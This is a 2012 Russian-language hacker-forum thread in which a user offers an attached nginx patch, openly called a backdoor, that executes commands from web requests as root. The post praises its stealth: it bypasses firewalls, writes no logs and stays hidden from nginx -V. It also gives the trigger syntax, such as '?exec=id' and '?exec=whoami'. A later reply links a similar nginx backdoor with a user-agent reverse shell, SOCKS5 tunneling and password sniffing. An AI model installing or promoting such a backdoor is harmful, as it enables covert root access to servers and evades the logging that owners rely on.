Старый 25.04.2012, 14:12   #1
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию [nginx][web root module]

Патч предоставляет возможность выполнять команды с веба от рута
Минусы:
  • нгинкс лучше собирать на целевой машине
  • не 100% стабильный. Помимо заглушки-ограничителя длинны никаких защит от подвисания worker-процесса
Плюсы:
  • доступ по вебу (фаерволы лесом)
  • не пишет логи
  • палится рутовый процесс только на время выполнения команды
  • не нужно трогать конфиг (как делает большенство дополнительных модулей)
  • не светится в nginx -V
Кстати о nginx -V, он показывает с каким ключами собран nginx, прямо их и нужно пихать в ./configure

Для леньтяев :
в этом варианте выполнение работает по маске
Код:
request_method [trash]?exec=[cmd][end]
например (красным то что попадает под выполнение):
Код:
https://web/blabla?exec=id => GET /blabla?exec=id HTTP/1.1......
http://web////oq3i4h/q5?exec=whoami => POST ////oq3i4h/q5?exec=whoami HTTP/1.0....
но не так:
Код:
https://web/?param1=val1&exec=id
https://web/?exec=id&param2=val2
Данные отдаются как text/plain

Отдельное спасибо SynQ

p.s. ну и скрин
Вложения
Тип файла: txt ngx_root.txt (7.8 Кб, 636 просмотров)
__________________
Sad panda

Последний раз редактировалось nobody; 25.04.2012 в 16:49..
nobody вне форума   Ответить с цитированием
Старый 25.04.2012, 16:44   #2
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

nginx должен в таком случае работать с правами root пользователя?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 25.04.2012, 16:50   #3
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

Да, это типа бекдора под нгинкс

ps Oo Здесь присутствуют: 11 (пользователей: 7 , гостей: 4). Переименовал тему, бо сдается мне ожидают люди видеть здесь другое
__________________
Sad panda
nobody вне форума   Ответить с цитированием
Старый 27.04.2012, 12:13   #4
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

круто, спасибо
12309 вне форума   Ответить с цитированием
Старый 14.09.2012, 10:54   #5
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

nginx 1.3.3 с бекконнектом по user-agent: http://www.cr0security.com/articles/nginx_backdoor.html

nginx remote shell access, SOCKS5 tunneling, and HTTP password sniffing

Последний раз редактировалось SynQ; 07.08.2013 в 12:33..
SynQ вне форума   Ответить с цитированием
Ответ

Метки
nginx patch, web root

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot